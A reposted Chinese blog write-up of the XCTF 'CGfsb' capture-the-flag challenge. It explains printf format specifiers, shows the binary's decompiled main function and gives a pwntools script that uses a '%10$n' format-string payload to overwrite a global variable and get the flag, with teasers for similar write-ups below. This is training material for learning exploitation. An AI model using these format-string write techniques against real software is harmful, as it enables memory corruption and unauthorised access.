day-4 xctf-pwn CGfsb

最新推荐文章于 2020-12-27 21:59:54 发布
最新推荐文章于 2020-12-27 21:59:54 发布
阅读量100 收藏
点赞数
原文链接:http://www.cnblogs.com/yidianhan/p/11581337.html
版权

xctf-pwn CGfsb

传送门:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5050

(菜鸡面对着pringf发愁)(-_-||)菜鸡了解的printf知识传送门:

https://blog.csdn.net/u010517901/article/details/46486341

 

%c:输出字符,配上%n可用于向指定地址写数据。

%d:输出十进制整数,配上%n可用于向指定地址写数据。

%x:输出16进制数据,如%i$x表示要泄漏偏移i处4字节长的16进制数据,%i$lx表示要泄漏偏移i处8字节长的16进制数据,32bit和64bit环境下一样。

%p:输出16进制数据,与%x基本一样,只是附加了前缀0x,在32bit下输出4字节,在64bit下输出8字节,可通过输出字节的长度来判断目标环境是32bit还是64bit。

%s:输出的内容是字符串,即将偏移处指针指向的字符串输出,如%i$s表示输出偏移i处地址所指向的字符串,在32bit和64bit环境下一样,可用于读取GOT表等信息。

%n:将%n之前printf已经打印的字符个数赋值给偏移处指针所指向的地址位置,如%100×10$n表示将0x64写入偏移10处保存的指针所指向的地址(4字节),而%$hn表示写入的地址空间为2字节,%$hhn表示写入的地址空间为1字节,%$lln表示写入的地址空间为8字节,在32bit和64bit环境下一样。有时,直接写4字节会导致程序崩溃或等候时间过长,可以通过%$hn或%$hhn来适时调整。

%n是通过格式化字符串漏洞改变程序流程的关键方式,而其他格式化字符串参数可用于读取信息或配合%n写数据。

printf("%2$c,%1$c\n", 'B', 'A');       //$表示使用第几个参数,输出A,B
 
printf("%88c%n\n", 'A', buff);         //打印88个字符,前面用空格填充,
                                       //最后一个是'A',同时*(int *)buff=88。
printf("%1024c%23$hn\n");              //带有攻击性的做法,第01个参数对用%c,
                                       //具体是什么不关心,目标是是把第23个参数
                                       //指向的内存的前2个字节赋值为1024。
printf("%*c%hn\n", 0x1234, 'A', buff); //打印0x1234个字符,前面用空格填充,
                                       //最后一个是'A',同时*(short *)buff = 0x1234。
输出格式

checksec一下。

 

 

 1 int __cdecl main(int argc, const char **argv, const char **envp)
 2 {
 3   int buf; // [esp+1Eh] [ebp-7Eh]
 4   int v5; // [esp+22h] [ebp-7Ah]
 5   __int16 v6; // [esp+26h] [ebp-76h]
 6   char s; // [esp+28h] [ebp-74h]
 7   unsigned int v8; // [esp+8Ch] [ebp-10h]
 8 
 9   v8 = __readgsdword(0x14u);
10   setbuf(stdin, 0);
11   setbuf(stdout, 0);
12   setbuf(stderr, 0);
13   buf = 0;
14   v5 = 0;
15   v6 = 0;
16   memset(&s, 0, 0x64u);
17   puts("please tell me your name:");
18   read(0, &buf, 0xAu);
19   puts("leave your message please:");
20   fgets(&s, 100, stdin);
21   printf("hello %s", &buf);
22   puts("your message is:");
23   printf(&s);
24   if ( pwnme == 8 )
25   {
26     puts("you pwned me, here is your flag:\n");
27     system("cat flag");
28   }
29   else
30   {
31     puts("Thank you!");
32   }
33   return 0;
34 }
反汇编代码

要输出flag需要执行 system("cat flag"),就需要pwnme为8,找到pwnme的位置:0x0804A068

 

 在printf处下断,输入name:1111,message:2222,并查看堆栈:(x/....命令相关介绍:https://blog.csdn.net/qq_31990441/article/details/99896551

 

 可以看到这个位置是我们的message信息(2的十六进制是32),是第10个(从0开始)

构造payload:

# coding=UTF-8
from pwn import *
context.log_level = 'debug'
#conn = process("./CGfsb")
conn = remote("111.198.29.45",43593)
pwnme = 0x0804A068
payload1 = 'aaaa'
payload2 = (p32(pwnme) + 'a'*4 + '%10$n')  
conn.recvuntil('name:')
conn.sendline(payload1)
conn.recvuntil('please:') 
conn.sendline(payload2)
print(conn.recvall())

得到flag

 

总结:printf确实是个危险的函数!

转载于:https://www.cnblogs.com/yidianhan/p/11581337.html

a525024162806525
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界pwn新手练习(CGfsb
BurYiA的博客
09-15 1633
CGfsb ok,按照惯例,拿到程序后先扔到Linux下查一下基本信息 32位程序,开了NX(堆栈不可执行)以及CANNARY(栈保护) 貌似有一丝丝头疼嗷,咱们运行一下,看看它的程序逻辑 唔,是一个留言板,可以输入的地方有两处,一处是名字,一处是留言内容。ok,可以扔进IDA分析了。 F5后直接看程序伪代码 很明显,我们需要让pwnme这个变量的值等于8,然后便可以拿到flag文件中的东西,...
XCTF 攻防世界 pwn CGfsb
热门推荐
stareforever的博客
12-22 2万+
XCTF 攻防世界 pwn CGfsb 题目流程 printf(&s) 明显的format string 漏洞 修改pwnme的值为8 完整的ex
xctf pwn1
qq_41071646的博客
05-14 963
这个题目我不知道为什么在网址上面没有打通 我只能在本机上玩了 本机的库是 2.23 所以我也按照 2.23来打了 然后这个题 可以用system 也可以用 one_gadget 用的是 one_gadget 然后说一下这个题 看起来 就是一个简单的 x64的栈溢出 然后我们看一下保护 这里面 有一个 canary 需要绕过的 其实看ida 也能看出来 v6就是我...
GetSafeHwnd
cffishappy的专栏
10-18 654
GetSafeHwnd   当我们想得到一个窗口对象(CWnd的派生对象)指针的句柄(HWND)时,最安全的方法是使用GetSafeHwnd()函数,通过下面的例子来看其理由:   CWnd *pwnd = FindWindow(“ExploreWClass”,NULL); //希望找到资源管理器   HWND hwnd = pwnd->m_hwnd; //得到它的HWND
xctf - cgfsb
just do IT
07-09 1412
查看程序保护 用IDA 打开 查看24行代码可知,通过修改全局变量pwnme = 8 则结束。 使用gdb 动态调试。 漏洞代码; pwnme 地址, exp: from pwn import * sh = remote('111.198.29.45',36640) sh.recv() sh.sendline('hacker') sh.recv() payload = p32(0x804a...
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
XMan-MISC-诸葛建伟XCTF-public.pdf
12-04
MISC,中文即杂项,包括隐写,数据还原,脑洞、社会工程、与信息安全相关的大数据等。 竞赛过程中解MISC时会涉及到各种脑洞,各种花式技巧,主要考察选手的快速理解、学习能力以及日常知识积累的广度、深度。...
XCTF-HW-pipeline附件
最新发布
11-09
附件
XCTF-RE】新手练习区-open-source.c
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/zgwso7
攻防世界 pwn cgfsb writeup
PLpa的博客
07-06 1880
攻防世界pwn——cgfsb 这一题是关于格式化字符串漏洞的题,是一个单一漏洞题,不需要太多的绕过。 拿到题目首先查看一下保护: 可以看到,这是一个32位的程序。 并且开启了Canary保护和NX保护。 我们看一下IDA: 进入IDA,按下F5可以得到伪C代码: 可以看到有一个格式化漏洞printf(&s),我们可以通过这条语句把pwnme的值改为8,就可以的到flag了。 打开gdb...
攻防世界_pwn_CGfsb(萌新版)-pwnme解惑
TedLau的博客
02-24 519
首发于鄙人博客:传送门 0x00 前言 格式化字符串漏洞。 file checksec结果如下所示: NX打开,就是说堆栈不可执行。 PIE未打开,也就是说,我们在ida中国所看到的就是函数地址在运行过程中的地址。 0x10 步骤 0x11 main函数 在main函数中,我们可以发现printf函数的用法与我们平时使用C语言的习惯不同,这样的用法会给系统...
XCTF-攻防世界 CGfsb 格式化字符串漏洞
river
07-02 4122
攻防世界-CGfsb-格式化字符串漏洞 参考自 http://geekfz.cn/index.php/2019/06/12/pwn-format/ 程序拿下来丢到IDA F5 int __cdecl main(int argc, const char **argv, const char **envp) { int buf; // [esp+1Eh] [ebp-7Eh] int v5; ...
攻防世界 新手区CGfsb
qq_25044201的博客
12-27 130
老办法看一下开启了哪些保护 然后放在ida静态分析一下 大体意思是全局变量pwnme=8时会获得flag 但是pwnme这个变量我们无法控制,怎么办呢? 其中有个关键的 这里如果我们输入%x 它会输出什么? 我输入了aaaa 以及12个%x linux系统会按栈的顺序一一输出内容 而aaaa 泄露在第11个参数 所以我们先泄露这个pwnme全局变量的位置 然后通过%$n修改这地址的值 所以完成 ...
CGfsb(xctf)
weixin_43868725的博客
05-06 657
0x0 程序保护和流程 保护: 流程: main() 可以明显的发现存在一个格式化字符串漏洞,然后当pwnme这个变量等于8时调用’cat flag’这个命令。又因为程序没有开启pie并且pwnme是全局变量,所以可以通过格式化字符串漏洞将pwnme这个变量改为8从而得到flag。 0x1 利用过程 首先先确定偏移量 可以发现偏移量是10,然后查看pwnme变量的地址 将pwnme的值改为...
CGCTF pwn CGfsb writeup
qq_39596232的博客
08-23 594
一、实验目的: 破解我的第一个pwn,获取flag(虽然也参考了别人*^*O*^*) 二、实验环境: Ubuntu 18.04 / gdb-peda / pwntools Windows7 IDA pro 三、实验内容: 1、题目到手,我们拿到了一个网址和ELF文件,首先我们对ELF文件进行分析: tucker@ubuntu:~/pwn_files$ checksec...
CGfsb [XCTF-PWN]CTF writeup系列2
重新启程
12-19 565
题目地址:CGfsb 先下载题目看看情况 中间步骤我就不再赘述了,直接就上来分析反编译的情况,先例行检查一下保护情况 checksec 5982010c172744c8a1c93c24b5200b21 [*] '/ctf/work/python/5982010c172744c8a1c93c24b5200b21' Arch: i386-32-little RE...
xctf攻防世界pwn基础题解(新手食用)
Spwpun的博客
05-01 2万+
文章目录CGFsb status:updating… CGFsb 前面的那一道get_shell的题算是做pwn题的一般流程:下载文件,ida查看代码,分析漏洞,利用漏洞写出exp,最常用的是用到python的pwntools,然后使用nc或者pwntools连接到虚拟场景实现漏洞攻击得到flag。 本题的思路基本一致,使用pwntools编写漏洞利用脚本,这里的漏洞是格式化字符串漏洞,文章分...
攻防世界-pwn CGfsb (格式化字符串)
菜的只能随便写写博客
08-05 1576
0x01 拿到题目之后首先分析文件 得到信息: 32bit ELF可执行文件 未开启PIE(即静态反汇编得地址可以直接使用) 0x02 执行文件 执行文件之后发现程序接收两个输入并将其原样输出   0x03 利用IDA反汇编 发现flag,需要将pwnme的值改为8才能拿到flag 通过查找发现pwnme在bss段,并且在程序之中用到了printf,可以考虑用格式化串漏洞将...
攻防世界pwnCGFsb
nzw1134864657的博客
07-27 303
先看一下文件是32位的,再查看一下程序的保护机制 发现栈的保护开启,程序会在栈里放入一个canary,返回时检测canary是否发生变化 我们先运行一下程序看一下逻辑 在IDA中打开查看伪代码,发现如果pwnme=8,就可以到得到flag 此处要利用格式化字符串漏洞,使用%n格式修改任意地址内容,把前面已经打印的长度写入某个内存地址中去。 在这里设置断点 查看一下pwnme的地址 在wr...
实战环境下的网络空间安全教育:GMIC-XCTF京津冀邀请赛与人才培养
"GMIC-XCTF京津冀邀请赛是一场聚焦网络空间安全的竞赛,旨在通过实战环境锤炼网络空间安全人才,推动该领域的人才培养。比赛中,北京航空航天大学的Lancet战队脱颖而出,获得了冠军。本次赛事体现了网络安全教育的新...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值